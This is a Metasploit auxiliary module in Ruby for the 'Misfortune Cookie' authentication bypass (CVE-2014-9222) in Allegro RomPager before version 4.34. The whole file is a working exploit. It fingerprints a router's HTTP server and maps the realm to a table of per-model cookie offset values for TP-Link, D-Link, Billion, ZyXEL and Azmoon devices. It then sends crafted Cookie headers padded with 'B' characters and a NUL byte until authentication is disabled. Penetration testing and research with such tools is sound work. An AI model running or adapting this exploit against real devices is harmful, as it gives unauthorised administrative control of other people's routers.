

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
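# Auxiliary module for the RomPager 'Misfortune Cookie' issue (CVE-2014-9222).
#
# Flow, as implemented below:
#   1. Request TARGETURI and fingerprint the response.
#   2. Proceed only if the fingerprint names RomPager with a version below
#      4.34 and carries a realm="..." string; the realm is used as the model key.
#   3. Look the model up in the table returned by #devices_list (or fall back
#      to every known value when the advanced option ForceAttempt is set).
#   4. Send one GET per table entry with a Cookie header built from that entry
#      and stop at the first response whose status code is <= 302.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Registers module metadata, the TARGETURI option and the ForceAttempt
  # advanced option.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
        'Description' => %q{
          This module exploits HTTP servers that appear to be vulnerable to the
          'Misfortune Cookie' vulnerability which affects Allegro Software
          Rompager versions before 4.34 and can allow attackers to authenticate
          to the HTTP service as an administrator without providing valid
          credentials.
        },
        'Author' => [
          'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
          'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
          'Lior Oppenheim' # CVE-2014-9222
        ],
        'References' => [
          ['CVE', '2014-9222'],
          ['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],
          ['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
          ['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
        ],
        'DisclosureDate' => '2014-12-17',
        'License' => MSF_LICENSE
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'URI to test', '/']),
      ], Exploit::Remote::HttpClient
    )

    register_advanced_options(
      [
        Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),
      ], Exploit::Remote::HttpClient
    )
  end

  # Extra request headers sent with every cookie attempt.
  #
  # @return [Hash] a single Referer header set to full_uri
  def headers
    { 'Referer' => full_uri }
  end

  # List of known values and models.
  #
  # Keys are the realm strings reported by the device, as symbols. Each entry
  # carries a vendor name, a model label and a list of [number, length] pairs;
  # #run turns each pair into one Cookie header.
  #
  # The :ALL entry is filled with the de-duplicated union of every other
  # entry's pairs and is what #run uses when ForceAttempt is set and the
  # reported model is not in the table.
  #
  # @return [Hash{Symbol => Hash}] model table including the synthesized :ALL entry
  def devices_list
    known_devices = {
      :'AZ-D140W' => {
        name: 'Azmoon', model: 'AZ-D140W', values: [
          [107367693, 13]
        ]
      },
      :'BiPAC 5102S' => {
        name: 'Billion', model: 'BiPAC 5102S', values: [
          [107369694, 13]
        ]
      },
      :'BiPAC 5200' => {
        name: 'Billion', model: 'BiPAC 5200', values: [
          [107369545, 9],
          [107371218, 21]
        ]
      },
      :'BiPAC 5200A' => {
        name: 'Billion', model: 'BiPAC 5200A', values: [
          [107366366, 25],
          [107371453, 9]
        ]
      },
      :'BiPAC 5200GR4' => {
        name: 'Billion', model: 'BiPAC 5200GR4', values: [
          [107367690, 21]
        ]
      },
      :'BiPAC 5200SRD' => {
        name: 'Billion', model: 'BiPAC 5200SRD', values: [
          [107368270, 1],
          [107371378, 3],
          [107371218, 13]
        ]
      },
      :'DSL-2520U' => {
        name: 'D-Link', model: 'DSL-2520U', values: [
          [107368902, 25]
        ]
      },
      :'DSL-2600U' => {
        name: 'D-Link', model: 'DSL-2600U', values: [
          [107366496, 13],
          [107360133, 20]
        ]
      },
      :'TD-8616' => {
        name: 'TP-Link', model: 'TD-8616', values: [
          [107371483, 21],
          [107369790, 17],
          [107371161, 1],
          [107371426, 17],
          [107370211, 5]
        ]
      },
      :'TD-8817' => {
        name: 'TP-Link', model: 'TD-8817', values: [
          [107369790, 17],
          [107369788, 1],
          [107369522, 25],
          [107369316, 21],
          [107369321, 9],
          [107351277, 20]
        ]
      },
      :'TD-8820' => {
        name: 'TP-Link', model: 'TD-8820', values: [
          [107369768, 17]
        ]
      },
      :'TD-8840T' => {
        name: 'TP-Link', model: 'TD-8840T', values: [
          [107369845, 5],
          [107369790, 17],
          [107369570, 1],
          [107369766, 1],
          [107369764, 5],
          [107369688, 17]
        ]
      },
      :'TD-W8101G' => {
        name: 'TP-Link', model: 'TD-W8101G', values: [
          [107367772, 37],
          [107367808, 21],
          [107367751, 21],
          [107367749, 13],
          [107367765, 25],
          [107367052, 25],
          [107365835, 1]
        ]
      },
      :'TD-W8151N' => {
        name: 'TP-Link', model: 'TD-W8151N', values: [
          [107353867, 24]
        ]
      },
      :'TD-W8901G' => {
        name: 'TP-Link', model: 'TD-W8901G', values: [
          [107367787, 21],
          [107368013, 5],
          [107367854, 9],
          [107367751, 21],
          [107367749, 13],
          [107367765, 25],
          [107367682, 21],
          [107365835, 1],
          [107367052, 25]
        ]
      },
      :'TD-W8901GB' => {
        name: 'TP-Link', model: 'TD-W8901GB', values: [
          [107367756, 13],
          [107369393, 21]
        ]
      },
      :'TD-W8901N' => {
        name: 'TP-Link', model: 'TD-W8901N', values: [
          [107353880, 0]
        ]
      },
      :'TD-W8951ND' => {
        name: 'TP-Link', model: 'TD-W8951ND', values: [
          [107369839, 25],
          [107369876, 13],
          [107366743, 21],
          [107364759, 25],
          [107364759, 13],
          [107364760, 21]
        ]
      },
      :'TD-W8961NB' => {
        name: 'TP-Link', model: 'TD-W8961NB', values: [
          [107369844, 17],
          [107367629, 21],
          [107366421, 13]
        ]
      },
      :'TD-W8961ND' => {
        name: 'TP-Link', model: 'TD-W8961ND', values: [
          [107369839, 25],
          [107369876, 13],
          [107364732, 25],
          [107364771, 37],
          [107364762, 29],
          [107353880, 0],
          [107353414, 36]
        ]
      },
      # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
      :'P-660R-T3 v3' => {
        name: 'ZyXEL', model: 'P-660R-T3', values: [
          [107369567, 21]
        ]
      },
      # Couldn't verify this
      # NOTE(review): the model label repeats 'P-660R-T3' although the key is
      # 'P-660RU-T3 v2'; it only affects the printed name. Confirm.
      :'P-660RU-T3 v2' => {
        name: 'ZyXEL', model: 'P-660R-T3', values: [
          [107369567, 21]
        ]
      },
      # Used when `ForceAttempt` === true.
      # The key must be the symbol :ALL because it is read back as
      # known_devices[:ALL] below and as devices_list[:ALL] in #run; a bare
      # `ALL` would be resolved as a constant.
      :ALL => { name: 'Unknown', model: 'Forced', values: [] }
    }

    # collect all known cookies for a brute force option
    known_devices[:ALL][:values] = known_devices.values.flat_map { |entry| entry[:values] }.uniq
    known_devices
  end

  # Decides from an HTTP fingerprint whether the server looks like an affected
  # RomPager build and, if so, which model it reports.
  #
  # The fingerprint string comes from http_fingerprint (HttpClient mixin); its
  # exact format is not visible in this file.
  #
  # @param res the response handed to http_fingerprint
  # @param fallback_status value returned when the fingerprint does not match
  # @return [String] the realm="..." capture when the fingerprint names
  #   RomPager with a version below 4.34 and contains a realm
  # @return [Object] fallback_status in every other case
  def check_response_fingerprint(res, fallback_status)
    fp = http_fingerprint(response: res)
    vprint_status("Fingerprint: #{fp}")
    # ensure the fingerprint at least appears vulnerable
    if %r{RomPager/(?<version>[\d.]+)} =~ fp
      vprint_status("#{peer} is RomPager #{version}")
      # 4.34 is the first version the module treats as not affected.
      if Rex::Version.new(version) < Rex::Version.new('4.34') && /realm="(?<model>.+)"/ =~ fp
        return model
      end
    end
    fallback_status
  end

  # Fingerprints the target and, for a recognised (or forced) model, sends the
  # per-model cookie requests until one is answered with a status <= 302.
  #
  # Each attempt is a GET for TARGETURI whose Cookie header has the form
  # `C<number>=BBB...` followed by a NUL byte, plus a Referer header; that
  # shape is what proxy or IDS logs would show for these requests.
  #
  # A status <= 302 is only a heuristic for success; the module prints a
  # message asking the operator to check the host and does not verify the
  # result itself. Nothing here reverts the device afterwards.
  #
  # @return [void]
  def run
    res = send_request_raw(
      'uri' => normalize_uri(target_uri.path.to_s),
      'method' => 'GET'
    )
    model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
    if model == Exploit::CheckCode::Detected
      print_error('Unknown device')
      return
    end

    # Build the table once; it is reused for the ForceAttempt fallback.
    catalog = devices_list
    device = catalog[model.to_sym]
    device = catalog[:ALL] if device.nil? && datastore['ForceAttempt']
    if device.nil?
      print_error("No matching values for fingerprint #{model}")
      return
    end

    print_good("Detected device:#{device[:name]} #{device[:model]}")
    device[:values].each do |value|
      cookie = "C#{value[0]}=#{'B' * value[1]}\x00"
      res = send_request_raw(
        'uri' => normalize_uri(target_uri.path.to_s),
        'method' => 'GET',
        'headers' => headers.merge('Cookie' => cookie)
      )
      if !res.nil? && (res.code <= 302)
        print_good('Good response, please check host, authentication should be disabled')
        break
      else
        print_error('Bad response')
      end
    end
  end
end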